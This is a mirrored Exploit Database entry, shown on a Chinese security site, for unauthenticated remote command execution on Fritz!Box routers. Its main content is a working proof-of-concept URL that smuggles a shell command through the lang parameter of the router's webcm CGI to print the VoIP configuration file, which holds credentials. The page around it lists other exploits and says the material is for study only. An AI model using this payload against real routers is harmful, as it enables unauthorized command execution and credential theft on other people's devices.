体验盒子
  • 博文
  • 设计开发
  • 网络安全
  • 观点
  • 服务
  • AI导航
  • 更多
    • 关于
    • 分享
    • 老电影
    • 搜索语法
    • SecTools
    • UserAgent解析
    • 地理坐标在线转换

Fritz!Box – Remote Command Execution

  • Exploit Database
  • 116 阅读
  • 作者: 0x4148
    日期: 2014-05-01
  • 类别:
    • webapps
    平台:
    • hardware
  • 来源:https://www.exploit-db.com/exploits/33136/
  • 1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    App : Fritz!Box
    Author : 0x4148
     
    Fritz!Box is Networking/voice Over ip router produced by AVM it suffer from Unauthenticated remote command execution flaw
     
    Poc :
    https://ip/cgi-bin/webcm?getpage=../html/menus/menu2.html&var:lang=%26%20cat%20/var/flash/voip.cfg%20%26
     
    #0x4148_rise
     
上一篇: Beetel 450TC2 Router – Cross-Site Request Forgery (Admin Password)
下一篇: F5 BIG-IQ 4.1.0.2013.0 – Privilege Escalation (Metasploit)
  • last Exploits
  • Fritz!Box – Remote Command Execution的更多信息
  • WordPress Plugin Huge-IT Image Gallery 1.0.1 – (Authenticated) SQL Injection:
  • iFdate Social Dating Script 2.0 – SQL Injection:
  • MyBB Plugin Recent Threads On Index – Cross-Site Scripting:
  • WordPress Plugin RokBox Plugin – ‘/wp-content/plugins/wp_rokbox/jwplayer/jwplayer.swf?abouttext’ Cross-Site Scripting:
  • Xavi 7968 ADSL Router – ‘/webconfig/lan/lan_config.html/local_lan_config?host_name_txtbox’ Cross-Site Scripting:
  • uc-http Daemon – Local File Inclusion / Directory Traversal:
  • Seagate BlackArmor NAS sg2000-2000.1331 – Multiple Persistent Cross-Site Scripting Vulnerabilities:
  • PHPCOIN 1.2.1 – ‘mod.php’ SQL Injection:
体验盒子
  • 关于
  • 博文
  • 分享
  • 存档
  • 服务
体验盒子所发布的一切资源仅限用于学习和研究目的。不得用于非法用途,否则,一切后果用户自负。

2024 体验盒子, 滇ICP备15006848号-1

扫码分享

网络安全
验证:体验盒子
扫码分享
网络安全
打赏零钱
  • 支付宝打赏
  • 微信打赏